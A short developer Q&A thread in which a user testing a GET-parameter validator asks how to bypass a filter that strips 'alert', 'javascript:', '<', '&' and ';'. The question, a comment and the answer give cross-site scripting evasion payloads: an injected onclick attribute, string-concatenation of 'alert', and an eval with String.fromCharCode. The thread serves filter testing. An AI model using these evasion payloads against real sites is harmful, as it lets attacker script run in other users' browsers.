# Javascript custom filters bypass

Tags: javascript, security, web

I am testing a piece of code that validates a GET variable. However, there are some inconsistencies as only the following strings and characters are being filtered out: '/', '/>', 'javascript:', 'alert', '&', '<' and ';'.

The following vector:

```
/validate.php?v=click="window["".concat("al","ert")](1)" widht="300" height="150"
```

produces the output:

```
<img src=no onclik="window["".concat("al", "ert")](1)" widht="300" height="150">
```

I am trying to launch the alert procedure by name, as the string "alert" is validated.

Is it possible to bypass this filter?

Comment: I guess the issue is using the same quotation marks in the click attribute as the string containers. `window[''.concat('al', 'ert')](1)` might do the trick.

Answer (score 1):

I guess to bypass this security you could also use `eval()` to run code and use characters written in char codes:

Example: `eval(['ale','rt',String.fromCharCode(40),'\'',String.fromCharCode(38),'\'',String.fromCharCode(41)].join(''))`

Which would run the code `alert('&')`, which even uses filtered characters by their char code.

Comment: Apparently, you can only use the concat method.